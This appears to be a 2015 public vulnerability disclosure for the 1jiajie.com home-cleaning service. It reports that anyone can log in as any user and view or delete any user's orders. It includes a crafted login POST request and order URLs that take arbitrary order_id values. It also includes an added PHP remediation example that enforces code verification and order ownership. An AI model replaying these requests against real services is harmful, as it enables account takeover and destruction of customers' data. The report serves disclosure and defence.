2015-10-20: Details sent to the vendor; awaiting vendor handling.
2015-10-25: The vendor actively ignored the vulnerability; details disclosed to the public.
E家洁 (1jiajie.com): a design flaw allows login as any user
WeChat official-account entry point:
POST /doLogin.php HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://m.1jiajie.com/login.php?from=wx&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; MI 2S Build/JRO03L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 MQQBrowser/5.4 TBS/025469 Mobile Safari/533.1 MicroMessenger/6.2.5.54_re87237d.622 NetType/WIFI Language/zh_CN
Origin: http://m.1jiajie.com
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: m.1jiajie.com
Cookie: Hm_lpvt_2fe9165c0d54a831546cc00eecdb0026=1445283698; Hm_lpvt_3163173ca7cc1075e84e6a692b711f3d=1445283698; Hm_lvt_2fe9165c0d54a831546cc00eecdb0026=1445283304,1445283697; Hm_lvt_3163173ca7cc1075e84e6a692b711f3d=1445283304,1445283698; PHPSESSID=0ckn82udq71jdm2l5h3n2rprb0; address0=; address1=; bd_st=%28%7B%22s%22%3A1445283754058%2C%22r%22%3A%22php%3Ffrom%3Dwx%26weixin_id%3Do7KvajnDlhdcL55L3CNAUepawQC4%22%7D%29; city_name=%E5%8C%97%E4%BA%AC; order_place_detail=; order_street=; wx_from=wx
Content-Length: 105

user_phone=18888888888&user_code=1234&login_type=0&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4&wx_qr_code_id=0
The PC site is affected as well; the method is the same as above:
https://mm.1jiajie.com/index.php
Viewing any user's order:
https://mm.1jiajie.com/orderDetails.php?order_id=123&platform_version=wap3.0&type=order_details
Deleting any user's order:
https://mm.1jiajie.com/dmyOrder.php?order_id=123&platform_version=wap3.0&type=delete_order
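The two defects reported above (a login that accepts a phone number with an unverified code, and order endpoints that trust a client-supplied order_id) share one root cause: the server does not tie the request to a verified identity. The report does not show 1jiajie.com's server code, so the following is an added example, not the vendor's code. It assumes a PDO connection $db, a users table (user_id, phone), an orders table (order_id, user_id, status, created_at) and an sms_codes table (phone, code_hash, expires_at, used) where codes are issued server-side; table and column names are placeholders chosen for the illustration. It shows a login handler that only creates a session for the account whose phone the code was issued to, and order handlers whose ownership check lives in the SQL predicate, so a guessed order_id from another account matches no rows.

```php
<?php
// Added example (not 1jiajie.com code). Assumptions: $db is a PDO handle,
// tables users / orders / sms_codes exist as described in the lead-in,
// and session_start() has already been called.
declare(strict_types=1);

/** Accept an SMS code only for the phone it was issued to, once, before expiry. */
function consumeLoginCode(PDO $db, string $phone, string $code): bool
{
    $stmt = $db->prepare(
        'SELECT id, code_hash, expires_at, used FROM sms_codes
          WHERE phone = :phone ORDER BY expires_at DESC LIMIT 1'
    );
    $stmt->execute([':phone' => $phone]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || (int) $row['used'] === 1) {
        return false;                       // no code issued, or already used
    }
    if (time() >= strtotime($row['expires_at'])) {
        return false;                       // expired
    }
    // Constant-time comparison of the hashed code; never compare raw strings with ==.
    if (!hash_equals($row['code_hash'], hash('sha256', $code))) {
        return false;
    }
    $db->prepare('UPDATE sms_codes SET used = 1 WHERE id = :id')->execute([':id' => $row['id']]);
    return true;
}

/** Log in: the session user_id comes from the users table, never from the client. */
function doLogin(PDO $db, string $phone, string $code): bool
{
    if (!preg_match('/^1\d{10}$/', $phone) || !consumeLoginCode($db, $phone, $code)) {
        return false;
    }
    $stmt = $db->prepare('SELECT user_id FROM users WHERE phone = :phone');
    $stmt->execute([':phone' => $phone]);
    $uid = $stmt->fetchColumn();
    if ($uid === false) {
        return false;                       // unknown account: do not auto-create here
    }
    session_regenerate_id(true);            // prevent session fixation across login
    $_SESSION['user_id'] = (int) $uid;
    return true;
}

function currentUserId(): int
{
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        exit('not logged in');
    }
    return (int) $_SESSION['user_id'];
}

/** Returns null both for "no such order" and "not your order", so the response does not leak which. */
function loadOwnOrder(PDO $db, int $orderId, int $userId): ?array
{
    $stmt = $db->prepare(
        'SELECT order_id, user_id, status, created_at FROM orders
          WHERE order_id = :oid AND user_id = :uid'
    );
    $stmt->execute([':oid' => $orderId, ':uid' => $userId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Ownership is part of the DELETE predicate: a foreign order_id deletes zero rows. */
function deleteOwnOrder(PDO $db, int $orderId, int $userId): bool
{
    $stmt = $db->prepare('DELETE FROM orders WHERE order_id = :oid AND user_id = :uid');
    $stmt->execute([':oid' => $orderId, ':uid' => $userId]);
    return $stmt->rowCount() === 1;
}

// Dispatcher mirroring the `type` parameter seen in the report's URLs.
$userId  = currentUserId();
$orderId = filter_input(INPUT_GET, 'order_id', FILTER_VALIDATE_INT);
if ($orderId === false || $orderId === null) {
    http_response_code(400);
    exit('bad order_id');
}
switch ($_GET['type'] ?? '') {
    case 'order_details':
        $order = loadOwnOrder($db, $orderId, $userId);
        if ($order === null) { http_response_code(404); exit('no such order'); }
        header('Content-Type: application/json');
        echo json_encode($order);
        break;
    case 'delete_order':
        if ($_SERVER['REQUEST_METHOD'] !== 'POST') { http_response_code(405); exit(); }
        echo deleteOwnOrder($db, $orderId, $userId) ? 'deleted' : 'no such order';
        break;
    default:
        http_response_code(400);
}
```

Two design points worth noting: the verification code is looked up by the phone number the server issued it for, so a valid code for one number cannot log in another; and the order handlers never load an order and then compare owners in PHP, because a separate "load, then check" step is exactly where such checks get forgotten. Deletion is also restricted to POST so that a GET link, as in the report, cannot trigger it.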
Severity: no impact (vendor ignored)
Ignored at: 2015-10-25 10:14
Vulnerability Rank: 4 (WooYun rating)
Vendor response: none